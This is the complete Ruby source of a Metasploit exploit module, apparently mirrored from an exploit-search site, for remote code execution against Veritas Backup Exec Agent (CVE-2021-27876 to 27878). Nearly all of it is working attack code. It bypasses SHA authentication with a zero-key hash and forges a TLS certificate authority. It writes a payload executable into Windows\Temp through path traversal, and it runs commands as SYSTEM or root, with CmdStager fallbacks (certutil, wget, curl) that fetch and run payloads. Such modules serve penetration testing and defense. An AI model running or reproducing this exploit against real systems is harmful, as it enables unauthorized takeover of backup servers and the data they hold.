Share
## https://sploitus.com/exploit?id=MSF:EXPLOIT-MULTI-VERITAS-BEAGENT_SHA_AUTH_RCE-
# frozen_string_literal: true

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::NDMPSocket
  include Msf::Exploit::CmdStager
  include Msf::Exploit::EXE
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Veritas Backup Exec Agent Remote Code Execution',
        'Description' => %q{
          Veritas Backup Exec Agent supports multiple authentication schemes and SHA authentication is one of them.
          This authentication scheme is no longer used within Backup Exec versions, but hadnโ€™t yet been disabled.
          An attacker could remotely exploit the SHA authentication scheme to gain unauthorized access to
          the BE Agent and execute an arbitrary OS command on the host with NT AUTHORITY\SYSTEM or root privileges
          depending on the platform.

          The vulnerability presents in 16.x, 20.x and 21.x versions of Backup Exec up to 21.2 (or up to and
          including Backup Exec Remote Agent revision 9.3)
        },
        'License' => MSF_LICENSE,
        'Author' => ['Alexander Korotin <0xc0rs[at]gmail.com>'],
        'References' => [
          ['CVE', '2021-27876'],
          ['CVE', '2021-27877'],
          ['CVE', '2021-27878'],
          ['URL', 'https://www.veritas.com/content/support/en_US/security/VTS21-001']
        ],
        'Platform' => %w[win linux],
        'Targets' => [
          [
            'Windows',
            {
              'Platform' => 'win',
              'Arch' => [ARCH_X86, ARCH_X64],
              'CmdStagerFlavor' => %w[certutil vbs psh_invokewebrequest debug_write debug_asm]
            }
          ],
          [
            'Linux',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X86, ARCH_X64],
              'CmdStagerFlavor' => %w[bourne wget curl echo]
            }
          ]
        ],
        'DefaultOptions' => {
          'RPORT' => 10_000
        },
        'Privileged' => true,
        'DisclosureDate' => '2021-03-01',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => [UNRELIABLE_SESSION],
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
        }
      )
    )

    register_options([
      OptString.new('SHELL', [true, 'The shell for executing OS command', '/bin/bash'],
                    conditions: ['TARGET', '==', 'Linux'])
    ])
    deregister_options('SRVHOST', 'SRVPORT', 'SSL', 'SSLCert', 'URIPATH')
  end

  def execute_command(cmd, opts = {})
    case target.opts['Platform']
    when 'win'
      wrap_cmd = "C:\\Windows\\System32\\cmd.exe /c \"#{cmd}\""
    when 'linux'
      wrap_cmd = "#{datastore['SHELL']} -c \"#{cmd}\""
    end
    ndmp_sock = opts[:ndmp_sock]
    ndmp_sock.do_request_response(
      NDMP::Message.new_request(
        NDMP_EXECUTE_COMMAND,
        NdmpExecuteCommandReq.new({ cmd: wrap_cmd, unknown: 0 }).to_xdr
      )
    )
  end

  def exploit
    print_status('Exploiting ...')

    ndmp_status, ndmp_sock, msg_fail_reason = ndmp_connect
    fail_with(Msf::Module::Failure::NotFound, "Can not connect to BE Agent service. #{msg_fail_reason}") unless ndmp_status

    ndmp_status, msg_fail_reason = tls_enabling(ndmp_sock)
    fail_with(Msf::Module::Failure::UnexpectedReply, "Can not establish TLS connection. #{msg_fail_reason}") unless ndmp_status

    ndmp_status, msg_fail_reason = sha_authentication(ndmp_sock)
    fail_with(Msf::Module::Failure::NotVulnerable, "Can not authenticate with SHA. #{msg_fail_reason}") unless ndmp_status

    if target.opts['Platform'] == 'win'
      filename = "#{rand_text_alpha(8)}.exe"
      ndmp_status, msg_fail_reason = win_write_upload(ndmp_sock, filename)
      if ndmp_status
        ndmp_status, msg_fail_reason = exec_win_command(ndmp_sock, filename)
        fail_with(Msf::Module::Failure::PayloadFailed, "Can not execute payload. #{msg_fail_reason}") unless ndmp_status
      else
        print_status('Can not upload payload with NDMP_FILE_WRITE packet. Trying to upload with CmdStager')
        execute_cmdstager({ ndmp_sock: ndmp_sock, linemax: 512 })
      end
    else
      print_status('Uploading payload with CmdStager')
      execute_cmdstager({ ndmp_sock: ndmp_sock, linemax: 512 })
    end
  end

  def check
    print_status('Checking vulnerability')

    ndmp_status, ndmp_sock, msg_fail_reason = ndmp_connect
    return Exploit::CheckCode::Unknown("Can not connect to BE Agent service. #{msg_fail_reason}") unless ndmp_status

    print_status('Getting supported authentication types')
    ndmp_msg = ndmp_sock.do_request_response(
      NDMP::Message.new_request(NDMP::Message::CONFIG_GET_SERVER_INFO)
    )
    ndmp_payload = NdmpConfigGetServerInfoRes.from_xdr(ndmp_msg.body)
    print_status("Supported authentication by BE agent: #{ndmp_payload.auth_types.map do |k, _|
                                                          "#{AUTH_TYPES[k]} (#{k})"
                                                        end.join(', ')}")
    print_status("BE agent revision: #{ndmp_payload.revision}")

    if ndmp_payload.auth_types.include?(5)
      Exploit::CheckCode::Appears('SHA authentication is enabled')
    else
      Exploit::CheckCode::Safe('SHA authentication is disabled')
    end
  end

  def ndmp_connect
    print_status('Connecting to BE Agent service')
    ndmp_msg = nil
    begin
      ndmp_sock = NDMP::Socket.new(connect)
    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout,
           Rex::ConnectionRefused => e
      return [false, nil, e.to_s]
    end
    begin
      Timeout.timeout(datastore['ConnectTimeout']) do
        ndmp_msg = ndmp_sock.read_ndmp_msg(NDMP::Message::NOTIFY_CONNECTED)
      end
    rescue Timeout::Error
      return [false, nil, 'No NDMP_NOTIFY_CONNECTED (0x502) packet from BE Agent service']
    else
      ndmp_payload = NdmpNotifyConnectedRes.from_xdr(ndmp_msg.body)
    end

    ndmp_msg = ndmp_sock.do_request_response(
      NDMP::Message.new_request(
        NDMP::Message::CONNECT_OPEN,
        NdmpConnectOpenReq.new({ version: ndmp_payload.version }).to_xdr
      )
    )

    ndmp_payload = NdmpConnectOpenRes.from_xdr(ndmp_msg.body)
    unless ndmp_payload.err_code.zero?
      return [false, ndmp_sock, "Error code of NDMP_CONNECT_OPEN (0x900) packet: #{ndmp_payload.err_code}"]
    end

    [true, ndmp_sock, nil]
  end

  def tls_enabling(ndmp_sock)
    print_status('Enabling TLS for NDMP connection')
    ndmp_tls_certs = NdmpTlsCerts.new('VeritasBE', datastore['RHOSTS'].to_s)
    ndmp_tls_certs.forge_ca
    ndmp_msg = ndmp_sock.do_request_response(
      NDMP::Message.new_request(
        NDMP_SSL_HANDSHAKE,
        NdmpSslHandshakeReq.new(ndmp_tls_certs.default_sslpacket_content(NdmpTlsCerts::SSL_HANDSHAKE_TYPES[:SSL_HANDSHAKE_CSR_REQ])).to_xdr
      )
    )
    ndmp_payload = NdmpSslHandshakeRes.from_xdr(ndmp_msg.body)
    unless ndmp_payload.err_code.zero?
      return [false, "Error code of SSL_HANDSHAKE_CSR_REQ (2) packet: #{ndmp_payload.err_code}"]
    end

    ndmp_tls_certs.sign_agent_csr(ndmp_payload.data)

    ndmp_msg = ndmp_sock.do_request_response(
      NDMP::Message.new_request(
        NDMP_SSL_HANDSHAKE,
        NdmpSslHandshakeReq.new(ndmp_tls_certs.default_sslpacket_content(NdmpTlsCerts::SSL_HANDSHAKE_TYPES[:SSL_HANDSHAKE_CSR_SIGNED])).to_xdr
      )
    )
    ndmp_payload = NdmpSslHandshakeRes.from_xdr(ndmp_msg.body)
    unless ndmp_payload.err_code.zero?
      return [false, "Error code of SSL_HANDSHAKE_CSR_SIGNED (3) packet: #{ndmp_payload.err_code}"]
    end

    ndmp_msg = ndmp_sock.do_request_response(
      NDMP::Message.new_request(
        NDMP_SSL_HANDSHAKE,
        NdmpSslHandshakeReq.new(ndmp_tls_certs.default_sslpacket_content(NdmpTlsCerts::SSL_HANDSHAKE_TYPES[:SSL_HANDSHAKE_CONNECT])).to_xdr
      )
    )
    ndmp_payload = NdmpSslHandshakeRes.from_xdr(ndmp_msg.body)
    unless ndmp_payload.err_code.zero?
      return [false, "Error code of SSL_HANDSHAKE_CONNECT (4) packet: #{ndmp_payload.err_code}"]
    end

    ssl_context = OpenSSL::SSL::SSLContext.new
    ssl_context.add_certificate(ndmp_tls_certs.ca_cert, ndmp_tls_certs.ca_key)
    ndmp_sock.wrap_with_ssl(ssl_context)
    [true, nil]
  end

  def sha_authentication(ndmp_sock)
    print_status('Passing SHA authentication')
    ndmp_msg = ndmp_sock.do_request_response(
      NDMP::Message.new_request(
        NDMP_CONFIG_GET_AUTH_ATTR,
        NdmpConfigGetAuthAttrReq.new({ auth_type: 5 }).to_xdr
      )
    )
    ndmp_payload = NdmpConfigGetAuthAttrRes.from_xdr(ndmp_msg.body)
    unless ndmp_payload.err_code.zero?
      return [false, "Error code of NDMP_CONFIG_GET_AUTH_ATTR (0x103) packet: #{ndmp_payload.err_code}"]
    end

    ndmp_msg = ndmp_sock.do_request_response(
      NDMP::Message.new_request(
        NDMP::Message::CONNECT_CLIENT_AUTH,
        NdmpConnectClientAuthReq.new(
          {
            auth_type: 5,
            username: 'Administrator', # Doesn't metter
            hash: Digest::SHA256.digest("\x00" * 64 + ndmp_payload.challenge)
          }
        ).to_xdr
      )
    )
    ndmp_payload = NdmpConnectClientAuthRes.from_xdr(ndmp_msg.body)
    unless ndmp_payload.err_code.zero?
      return [false, "Error code of NDMP_CONECT_CLIENT_AUTH (0x901) packet: #{ndmp_payload.err_code}"]
    end

    [true, nil]
  end

  def win_write_upload(ndmp_sock, filename)
    print_status('Uploading payload with NDMP_FILE_WRITE packet')
    ndmp_msg = ndmp_sock.do_request_response(
      NDMP::Message.new_request(
        NDMP_FILE_OPEN_EXT,
        NdmpFileOpenExtReq.new(
          {
            filename: filename,
            dir: '..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\Temp',
            mode: 4
          }
        ).to_xdr
      )
    )
    ndmp_payload = NdmpFileOpenExtRes.from_xdr(ndmp_msg.body)
    unless ndmp_payload.err_code.zero?
      return [false, "Error code of NDMP_FILE_OPEN_EXT (0xf308) packet: #{ndmp_payload.err_code}"]
    end

    hnd = ndmp_payload.handler
    exe = generate_payload_exe
    offset = 0
    block_size = 2048

    while offset < exe.length
      ndmp_msg = ndmp_sock.do_request_response(
        NDMP::Message.new_request(
          NDMP_FILE_WRITE,
          NdmpFileWriteReq.new({ handler: hnd, len: block_size, data: exe[offset, block_size] }).to_xdr
        )
      )
      ndmp_payload = NdmpFileWriteRes.from_xdr(ndmp_msg.body)
      unless ndmp_payload.err_code.zero?
        return [false, "Error code of NDMP_FILE_WRITE (0xF309) packet: #{ndmp_payload.err_code}"]
      end

      offset += block_size
    end

    ndmp_msg = ndmp_sock.do_request_response(
      NDMP::Message.new_request(
        NDMP_FILE_CLOSE,
        NdmpFileCloseReq.new({ handler: hnd }).to_xdr
      )
    )
    ndmp_payload = NdmpFileCloseRes.from_xdr(ndmp_msg.body)
    unless ndmp_payload.err_code.zero?
      return [false, "Error code of NDMP_FILE_CLOSE (0xF306) packet: #{ndmp_payload.err_code}"]
    end

    [true, nil]
  end

  def exec_win_command(ndmp_sock, filename)
    cmd = "C:\\Windows\\System32\\cmd.exe /c \"C:\\Windows\\Temp\\#{filename}\""
    ndmp_msg = ndmp_sock.do_request_response(
      NDMP::Message.new_request(
        NDMP_EXECUTE_COMMAND,
        NdmpExecuteCommandReq.new({ cmd: cmd, unknown: 0 }).to_xdr
      )
    )
    ndmp_payload = NdmpExecuteCommandRes.from_xdr(ndmp_msg.body)
    unless ndmp_payload.err_code.zero?
      return [false, "Error code of NDMP_EXECUTE_COMMAND (0xF30F) packet: #{ndmp_payload.err_code}"]
    end

    [true, nil]
  end

  # Class to create CA and client certificates
  class NdmpTlsCerts
    def initialize(hostname, ip)
      @hostname = hostname
      @ip = ip
      @ca_key = nil
      @ca_cert = nil
      @be_agent_cert = nil
    end

    SSL_HANDSHAKE_TYPES = {
      SSL_HANDSHAKE_TEST_CERT: 1,
      SSL_HANDSHAKE_CSR_REQ: 2,
      SSL_HANDSHAKE_CSR_SIGNED: 3,
      SSL_HANDSHAKE_CONNECT: 4
    }.freeze

    attr_reader :ca_cert, :ca_key

    def forge_ca
      @ca_key = OpenSSL::PKey::RSA.new(2048)
      @ca_cert = OpenSSL::X509::Certificate.new
      @ca_cert.version = 2
      @ca_cert.serial = rand(2**32..2**64 - 1)
      @ca_cert.subject = @ca_cert.issuer = OpenSSL::X509::Name.parse("/CN=#{@hostname}")
      extn_factory = OpenSSL::X509::ExtensionFactory.new(@ca_cert, @ca_cert)
      @ca_cert.extensions = [
        extn_factory.create_extension('subjectKeyIdentifier', 'hash'),
        extn_factory.create_extension('basicConstraints', 'CA:TRUE'),
        extn_factory.create_extension('keyUsage', 'keyCertSign, cRLSign')
      ]
      @ca_cert.add_extension(extn_factory.create_extension('authorityKeyIdentifier', 'keyid:always'))
      @ca_cert.public_key = @ca_key.public_key
      @ca_cert.not_before = Time.now - 7 * 60 * 60 * 24
      @ca_cert.not_after = Time.now + 14 * 24 * 60 * 60
      @ca_cert.sign(@ca_key, OpenSSL::Digest.new('SHA256'))
    end

    def sign_agent_csr(csr)
      o_csr = OpenSSL::X509::Request.new(csr)
      @be_agent_cert = OpenSSL::X509::Certificate.new
      @be_agent_cert.version = 2
      @be_agent_cert.serial = rand(2**32..2**64 - 1)
      @be_agent_cert.not_before = Time.now - 7 * 60 * 60 * 24
      @be_agent_cert.not_after = Time.now + 14 * 24 * 60 * 60
      @be_agent_cert.issuer = @ca_cert.subject
      @be_agent_cert.subject = o_csr.subject
      @be_agent_cert.public_key = o_csr.public_key
      @be_agent_cert.sign(@ca_key, OpenSSL::Digest.new('SHA256'))
    end

    def default_sslpacket_content(ssl_packet_type)
      if ssl_packet_type == SSL_HANDSHAKE_TYPES[:SSL_HANDSHAKE_CSR_SIGNED]
        ca_cert = @ca_cert.to_s
        agent_cert = @be_agent_cert.to_s
      else
        ca_cert = ''
        agent_cert = ''
      end
      {
        ssl_packet_type: ssl_packet_type,
        hostname: @hostname,
        nb_hostname: @hostname.upcase,
        ip_addr: @ip,
        cert_id1: get_cert_id(@ca_cert),
        cert_id2: get_cert_id(@ca_cert),
        unknown1: 0,
        unknown2: 0,
        ca_cert_len: ca_cert.length,
        ca_cert: ca_cert,
        agent_cert_len: agent_cert.length,
        agent_cert: agent_cert
      }
    end

    def get_cert_id(cert)
      Digest::SHA1.digest(cert.issuer.to_s + cert.serial.to_s(2))[0...4].unpack1('L<')
    end
  end

  NDMP_CONFIG_GET_AUTH_ATTR = 0x103
  NDMP_SSL_HANDSHAKE = 0xf383
  NDMP_EXECUTE_COMMAND = 0xf30f
  NDMP_FILE_OPEN_EXT = 0xf308
  NDMP_FILE_WRITE = 0xF309
  NDMP_FILE_CLOSE = 0xF306

  AUTH_TYPES = {
    1 => 'Text',
    2 => 'MD5',
    3 => 'BEWS',
    4 => 'SSPI',
    5 => 'SHA',
    190 => 'BEWS2' # 0xBE
  }.freeze

  # Responce packets
  class NdmpNotifyConnectedRes < XDR::Struct
    attribute :connected, XDR::Int
    attribute :version, XDR::Int
    attribute :reason, XDR::Int
  end

  class NdmpConnectOpenRes < XDR::Struct
    attribute :err_code, XDR::Int
  end

  class NdmpConfigGetServerInfoRes < XDR::Struct
    attribute :err_code, XDR::Int
    attribute :vendor_name, XDR::String[]
    attribute :product_name, XDR::String[]
    attribute :revision, XDR::String[]
    attribute :auth_types, XDR::VarArray[XDR::Int]
  end

  class NdmpConfigGetHostInfoRes < XDR::Struct
    attribute :err_code, XDR::Int
    attribute :hostname, XDR::String[]
    attribute :os, XDR::String[]
    attribute :os_info, XDR::String[]
    attribute :ip, XDR::String[]
  end

  class NdmpSslHandshakeRes < XDR::Struct
    attribute :data_len, XDR::Int
    attribute :data, XDR::String[]
    attribute :err_code, XDR::Int
    attribute :unknown4, XDR::String[]
  end

  class NdmpConfigGetAuthAttrRes < XDR::Struct
    attribute :err_code, XDR::Int
    attribute :auth_type, XDR::Int
    attribute :challenge, XDR::Opaque[64]
  end

  class NdmpConnectClientAuthRes < XDR::Struct
    attribute :err_code, XDR::Int
  end

  class NdmpExecuteCommandRes < XDR::Struct
    attribute :err_code, XDR::Int
  end

  class NdmpFileOpenExtRes < XDR::Struct
    attribute :err_code, XDR::Int
    attribute :handler, XDR::Int
  end

  class NdmpFileWriteRes < XDR::Struct
    attribute :err_code, XDR::Int
    attribute :recv_len, XDR::Int
    attribute :unknown, XDR::Int
  end

  class NdmpFileCloseRes < XDR::Struct
    attribute :err_code, XDR::Int
  end

  # Request packets
  class NdmpConnectOpenReq < XDR::Struct
    attribute :version, XDR::Int
  end

  class NdmpSslHandshakeReq < XDR::Struct
    attribute :ssl_packet_type, XDR::Int
    attribute :nb_hostname, XDR::String[]
    attribute :hostname, XDR::String[]
    attribute :ip_addr, XDR::String[]
    attribute :cert_id1, XDR::Int
    attribute :cert_id2, XDR::Int
    attribute :unknown1, XDR::Int
    attribute :unknown2, XDR::Int
    attribute :ca_cert_len, XDR::Int
    attribute :ca_cert, XDR::String[]
    attribute :agent_cert_len, XDR::Int
    attribute :agent_cert, XDR::String[]
  end

  class NdmpConfigGetAuthAttrReq < XDR::Struct
    attribute :auth_type, XDR::Int
  end

  class NdmpConnectClientAuthReq < XDR::Struct
    attribute :auth_type, XDR::Int
    attribute :username, XDR::String[]
    attribute :hash, XDR::Opaque[32]
  end

  class NdmpExecuteCommandReq < XDR::Struct
    attribute :cmd, XDR::String[]
    attribute :unknown, XDR::Int
  end

  class NdmpFileOpenExtReq < XDR::Struct
    attribute :filename, XDR::String[]
    attribute :dir, XDR::String[]
    attribute :mode, XDR::Int
  end

  class NdmpFileWriteReq < XDR::Struct
    attribute :handler, XDR::Int
    attribute :len, XDR::Int
    attribute :data, XDR::String[]
  end

  class NdmpFileCloseReq < XDR::Struct
    attribute :handler, XDR::Int
  end
end